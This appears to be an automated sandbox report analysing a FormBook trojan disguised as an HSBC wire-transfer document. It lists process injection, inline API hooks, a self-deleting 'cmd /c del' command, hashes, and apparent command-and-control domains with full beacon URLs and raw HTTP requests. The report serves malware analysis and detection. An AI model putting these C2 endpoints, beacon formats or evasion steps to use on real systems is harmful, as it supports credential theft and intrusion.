          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Process created: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe
          Source: C:\Windows\SysWOW64\ipconfig.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"
          Source: explorer.exe, 0000000C.00000000.292730514.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.327470385.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.308786581.00000000011E0000.00000002.00020000.sdmp, ipconfig.exe, 00000010.00000002.551824267.0000000004AB0000.00000002.00020000.sdmp; Binary or memory string: Program Manager
          Source: explorer.exe, 0000000C.00000000.291644026.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.327163839.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.308348112.0000000000B68000.00000004.00000020.sdmp; Binary or memory string: Progman\Pr
          Source: explorer.exe, 0000000C.00000000.292730514.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.327470385.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.316504406.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.308786581.00000000011E0000.00000002.00020000.sdmp, ipconfig.exe, 00000010.00000002.551824267.0000000004AB0000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000C.00000000.292730514.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.327470385.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.308786581.00000000011E0000.00000002.00020000.sdmp, ipconfig.exe, 00000010.00000002.551824267.0000000004AB0000.00000002.00020000.sdmp; Binary or memory string: Progman
          Source: explorer.exe, 0000000C.00000000.292730514.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.327470385.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.308786581.00000000011E0000.00000002.00020000.sdmp, ipconfig.exe, 00000010.00000002.551824267.0000000004AB0000.00000002.00020000.sdmp; Binary or memory string: Progmanlock
          Source: explorer.exe, 0000000C.00000000.319632104.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.301501003.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.335138574.0000000008778000.00000004.00000001.sdmp; Binary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Queries volume information: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe VolumeInformation
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
          |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
          | Valid Accounts | Command and Scripting Interpreter 2 | Path Interception | Process Injection 512 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 221 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
          | Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
          | Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 1 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
          | Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion 31 | NTDS | Application Window Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud |
          | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 512 | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
          | Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information 1 | Cached Domain Credentials | System Network Configuration Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
          | External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 4 | DCSync | System Information Discovery 112 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
          | Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 13 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
          | Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | File Deletion 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction |

          Behavior Graph

          Behavior Graph ID: 528773; Sample: HSBC ... Wire Transfer Copy.exe; Startdate: 25/11/2021; Architecture: WINDOWS; Score: 100

          Signatures (overall): Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 7 other signatures

          Process tree:
          • HSBC ... Wire Transfer Copy.exe (started)
            Dropped file: C:\...\HSBC ... Wire Transfer Copy.exe.log, ASCII
            • HSBC ... Wire Transfer Copy.exe (started)
              Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
              • explorer.exe (injected)
                DNS/IP: www.piramsgprodiet.store; www.gramaltinrafineri.com; 4 other IPs or domains
                Signatures: System process connects to network (likely due to code injection or exploit); Uses ipconfig to lookup or modify the Windows network settings
                • ipconfig.exe (started)
                  Signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                  • cmd.exe (started)
                    • conhost.exe (started)

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | HSBC ... Wire Transfer Copy.exe | 17% | Virustotal | |
          | HSBC ... Wire Transfer Copy.exe | 40% | ReversingLabs | Win32.Trojan.AgentTesla |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
          | 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
          | 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
          | 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |

          Domains

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | gramaltinrafineri.com | 0% | Virustotal | |
          | catproductreviews.com | 0% | Virustotal | |

          URLs

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | http://www.gramaltinrafineri.com/m4n8/?5jblCF=6FC/YAdxArGDbOG0ZU8ranLB3olQ8/HIU17UMwKJ54PfoS0z6/xA4+VoDBKhLnDEQ6+k&l0G=-Zrd9J1pqHLdHPo | 0% | Avira URL Cloud | safe |
          | www.atlantiscompania.com/m4n8/ | 0% | Avira URL Cloud | safe |
          | http://www.catproductreviews.com/m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=fqwcloTwW+H6Usea82LuZckhsM6vXxH+7LRp9WPFBQLwjEJmVheIZ7PCXY+dS9vifeb6 | 0% | Avira URL Cloud | safe |
          | https://www.piramsgprodiet.store/m4n8/?l0G=-Zrd9J1pqHLdHPo&amp;5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNH | 0% | Avira URL Cloud | safe |

          Domains and IPs

          Contacted Domains

          | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
          |---|---|---|---|---|---|
          | ghs.google.com | 172.217.168.83 | true | false | | high |
          | gramaltinrafineri.com | 34.102.136.180 | true | false | | unknown |
          | catproductreviews.com | 34.102.136.180 | true | false | | unknown |
          | www.catproductreviews.com | unknown | unknown | true | | unknown |
          | www.piramsgprodiet.store | unknown | unknown | true | | unknown |
          | www.gramaltinrafineri.com | unknown | unknown | true | | unknown |

                  Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.gramaltinrafineri.com/m4n8/?5jblCF=6FC/YAdxArGDbOG0ZU8ranLB3olQ8/HIU17UMwKJ54PfoS0z6/xA4+VoDBKhLnDEQ6+k&l0G=-Zrd9J1pqHLdHPo | false | Avira URL Cloud: safe | unknown
www.atlantiscompania.com/m4n8/ | true | Avira URL Cloud: safe | low
http://www.catproductreviews.com/m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=fqwcloTwW+H6Usea82LuZckhsM6vXxH+7LRp9WPFBQLwjEJmVheIZ7PCXY+dS9vifeb6 | false | Avira URL Cloud: safe | unknown

                  URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | HSBC ... Wire Transfer Copy.exe, 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmp | false | | high
https://www.piramsgprodiet.store/m4n8/?l0G=-Zrd9J1pqHLdHPo&amp;5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNH | ipconfig.exe, 00000010.00000002.551598331.000000000403F000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown

                    Contacted IPs

                    Public

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
34.102.136.180 | gramaltinrafineri.com | United States | | 15169 | GOOGLEUS | false
172.217.168.83 | ghs.google.com | United States | | 15169 | GOOGLEUS | false

                    General Information

                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:528773
                    Start date:25.11.2021
                    Start time:18:55:52
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 9m 28s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:HSBC ... Wire Transfer Copy.exe
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:29
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:1
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@7/1@3/2
                    EGA Information:Failed
                    HDC Information:
                    • Successful, ratio: 20.1% (good quality ratio 18.2%)
                    • Quality average: 73.7%
                    • Quality standard deviation: 31%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 68
                    • Number of non-executed functions: 164
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .exe
                    Warnings:
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed, report is missing behavior information

                    Simulations

                    Behavior and APIs

Time | Type | Description
18:56:46 | API Interceptor | 21x Sleep call for process: HSBC ... Wire Transfer Copy.exe modified

                    Joe Sandbox View / Context

                    IPs

                    No context

                    Domains

                    No context

                    ASN

                    No context

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HSBC ... Wire Transfer Copy.exe.log
                    Process:C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):2239
                    Entropy (8bit):5.354287817410997
                    Encrypted:false
                    SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIW7HKjntHoxHhAHKzvr1qHXHK2HKgmHKovjHKs:iqXeqm00YqhQnouRqjntIxHeqzTw3q2W
                    MD5:913D1EEA179415C6D08FB255AE42B99D
                    SHA1:E994C612C0596994AAE55FBCE35B7A4FBE312FD7
                    SHA-256:473B4000084ACF4C7D701CE72EBF71BD304054231B3BDF7CAF49898A1FDA13D0
                    SHA-512:768045C288CEEE8FE1A099FC8CEA713B685F6ED3FD8BFA1C8E64CA09F7AF9FEBEA90F5277B28444AFF8F2AC7CD857DFCDF7D3A98CD86288925DB7A4A42346185
                    Malicious:true
                    Reputation:moderate, very likely benign file
                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Entropy (8bit):7.856337226634709
                    TrID:
                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    • Win32 Executable (generic) a (10002005/4) 49.78%
                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                    • Generic Win/DOS Executable (2004/3) 0.01%
                    • DOS Executable Generic (2002/1) 0.01%
                    File name:HSBC ... Wire Transfer Copy.exe
                    File size:471552
                    MD5:99b154970d15748d1df9025f675ecc76
                    SHA1:75503611daf18643a401c2020ae9e045111b7f1f
                    SHA256:13af03cd2db9c68bc397fd81f101287df005f27bc806737ffad390324a068d4c
                    SHA512:9fd769b3292753089bf5e7a1bd805867cc80e670ad43b371cad39acd9124813ab17d7ca6a58211f40e295183ed0eafd22b8a6c4e271f30bf5a500bdfd7376786
                    SSDEEP:12288:6afBLr0oixBFmHFMrvCayGyIgA8flRFPpjxWkSHZ3t7fNv2RkY:Hf9r0oi15rPgqbHj7hyp
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...VK.a..............0..(...........F... ...`....@.. ....................................@................................

                    File Icon

                    Icon Hash:00828e8e8686b000

                    Static PE Info

                    General

                    Entrypoint:0x474616
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Time Stamp:0x619F4B56 [Thu Nov 25 08:37:42 2021 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:v4.0.30319
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                    Entrypoint Preview

                    Instruction
                    jmp dword ptr [00402000h]
                    add byte ptr [eax], al
                    add byte ptr [ebp+0800000Eh], ch

                    Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x745c4 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x76000 | 0x5cc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x78000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                    Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x7262c | 0x72800 | False | 0.890049297216 | data | 7.86790735928 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x76000 | 0x5cc | 0x600 | False | 0.431640625 | data | 4.1545049772 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x78000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                    Resources

Name | RVA | Size | Type | Language | Country
RT_VERSION | 0x76090 | 0x33c | data | |
RT_MANIFEST | 0x763dc | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                    Imports

DLL | Import
mscoree.dll | _CorExeMain

                    Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright Rogers Peet
Assembly Version | 8.0.6.0
InternalName | ISectionEnt.exe
FileVersion | 5.6.0.0
CompanyName | Rogers Peet
LegalTrademarks |
Comments |
ProductName | Biblan
ProductVersion | 5.6.0.0
FileDescription | Biblan
OriginalFilename | ISectionEnt.exe

                    Network Behavior

                    Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/25/21-18:58:23.381848 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49808 | 34.102.136.180 | 192.168.2.3
11/25/21-18:58:43.848526 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49809 | 34.102.136.180 | 192.168.2.3

                    Network Port Distribution

                    TCP Packets


                    UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 25, 2021 18:58:02.291693926 CET | 52130 | 53 | 192.168.2.3 | 8.8.8.8
Nov 25, 2021 18:58:02.361125946 CET | 53 | 52130 | 8.8.8.8 | 192.168.2.3
Nov 25, 2021 18:58:23.095354080 CET | 56236 | 53 | 192.168.2.3 | 8.8.8.8
Nov 25, 2021 18:58:23.179235935 CET | 53 | 56236 | 8.8.8.8 | 192.168.2.3
Nov 25, 2021 18:58:43.582144022 CET | 56527 | 53 | 192.168.2.3 | 8.8.8.8
Nov 25, 2021 18:58:43.645256042 CET | 53 | 56527 | 8.8.8.8 | 192.168.2.3

                    DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 25, 2021 18:58:02.291693926 CET | 192.168.2.3 | 8.8.8.8 | 0xd3fe | Standard query (0) | www.piramsgprodiet.store | A (IP address) | IN (0x0001)
Nov 25, 2021 18:58:23.095354080 CET | 192.168.2.3 | 8.8.8.8 | 0x7208 | Standard query (0) | www.gramaltinrafineri.com | A (IP address) | IN (0x0001)
Nov 25, 2021 18:58:43.582144022 CET | 192.168.2.3 | 8.8.8.8 | 0x81d2 | Standard query (0) | www.catproductreviews.com | A (IP address) | IN (0x0001)

                    DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 25, 2021 18:58:02.361125946 CET | 8.8.8.8 | 192.168.2.3 | 0xd3fe | No error (0) | www.piramsgprodiet.store | ghs.google.com | | CNAME (Canonical name) | IN (0x0001)
Nov 25, 2021 18:58:02.361125946 CET | 8.8.8.8 | 192.168.2.3 | 0xd3fe | No error (0) | ghs.google.com | | 172.217.168.83 | A (IP address) | IN (0x0001)
Nov 25, 2021 18:58:23.179235935 CET | 8.8.8.8 | 192.168.2.3 | 0x7208 | No error (0) | www.gramaltinrafineri.com | gramaltinrafineri.com | | CNAME (Canonical name) | IN (0x0001)
Nov 25, 2021 18:58:23.179235935 CET | 8.8.8.8 | 192.168.2.3 | 0x7208 | No error (0) | gramaltinrafineri.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Nov 25, 2021 18:58:43.645256042 CET | 8.8.8.8 | 192.168.2.3 | 0x81d2 | No error (0) | www.catproductreviews.com | catproductreviews.com | | CNAME (Canonical name) | IN (0x0001)
Nov 25, 2021 18:58:43.645256042 CET | 8.8.8.8 | 192.168.2.3 | 0x81d2 | No error (0) | catproductreviews.com | | 34.102.136.180 | A (IP address) | IN (0x0001)

                    HTTP Request Dependency Graph

                    • www.piramsgprodiet.store
                    • www.gramaltinrafineri.com
                    • www.catproductreviews.com

                    HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49784 | 172.217.168.83 | 80 | C:\Windows\explorer.exe
Timestamp: Nov 25, 2021 18:58:02.403076887 CET | kBytes transferred: 8201 | Direction: OUT | Data:
GET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNHyAaYYkpUFqoPlzKT8wvvxP2/AQv7fSiFC9KSL+ HTTP/1.1
                    Host: www.piramsgprodiet.store
                    Connection: close
                    Data Raw: 00 00 00 00 00 00 00
                    Data Ascii:
Timestamp: Nov 25, 2021 18:58:02.562637091 CET | kBytes transferred: 8202 | Direction: IN | Data:
HTTP/1.1 301 Moved Permanently
                    Location: https://www.piramsgprodiet.store/m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNHyAaYYkpUFqoPlzKT8wvvxP2/AQv7fSiFC9KSL+
                    Content-Type: text/html; charset=UTF-8
                    Date: Thu, 25 Nov 2021 17:58:02 GMT
                    Expires: Thu, 25 Nov 2021 17:58:02 GMT
                    Cache-Control: private, max-age=0
                    X-Content-Type-Options: nosniff
                    X-Frame-Options: SAMEORIGIN
                    Content-Security-Policy: frame-ancestors 'self'
                    X-XSS-Protection: 1; mode=block
                    Server: GSE
                    Accept-Ranges: none
                    Vary: Accept-Encoding
                    Transfer-Encoding: chunked
                    Connection: close
                    Data Ascii: 140<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Permanently</H1>The document has moved <A HREF="https://www.piramsgprodiet.store/m4n8/?l0G=-Zrd9J1pqHLdHPo&amp;5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNHyAaYYkpUFqoPlzKT8wvvxP2/AQv7fSiFC9KSL+">here</A>.</BODY></HTML>
Timestamp: Nov 25, 2021 18:58:02.562691927 CET | kBytes transferred: 8202 | Direction: IN | Data:
Data Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49808 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp: Nov 25, 2021 18:58:23.200145006 CET | kBytes transferred: 8263 | Direction: OUT | Data:
GET /m4n8/?5jblCF=6FC/YAdxArGDbOG0ZU8ranLB3olQ8/HIU17UMwKJ54PfoS0z6/xA4+VoDBKhLnDEQ6+k&l0G=-Zrd9J1pqHLdHPo HTTP/1.1
                    Host: www.gramaltinrafineri.com
                    Connection: close
                    Data Raw: 00 00 00 00 00 00 00
                    Data Ascii:
Timestamp: Nov 25, 2021 18:58:23.381848097 CET | kBytes transferred: 8264 | Direction: IN | Data:
HTTP/1.1 403 Forbidden
                    Server: openresty
                    Date: Thu, 25 Nov 2021 17:58:23 GMT
                    Content-Type: text/html
                    Content-Length: 275
                    ETag: "61973ffe-113"
                    Via: 1.1 google
                    Connection: close
                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49809 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp: Nov 25, 2021 18:58:43.668176889 CET | kBytes transferred: 8265 | Direction: OUT | Data:
GET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=fqwcloTwW+H6Usea82LuZckhsM6vXxH+7LRp9WPFBQLwjEJmVheIZ7PCXY+dS9vifeb6 HTTP/1.1
                    Host: www.catproductreviews.com
                    Connection: close
                    Data Raw: 00 00 00 00 00 00 00
                    Data Ascii:
Timestamp: Nov 25, 2021 18:58:43.848526001 CET | kBytes transferred: 8266 | Direction: IN | Data:
HTTP/1.1 403 Forbidden
                    Server: openresty
                    Date: Thu, 25 Nov 2021 17:58:43 GMT
                    Content-Type: text/html
                    Content-Length: 275
                    ETag: "61973ffe-113"
                    Via: 1.1 google
                    Connection: close
                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                    Code Manipulations

                    User Modules

                    Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

                    Processes

                    Process: explorer.exe, Module: user32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xEF
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xEF
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xEF
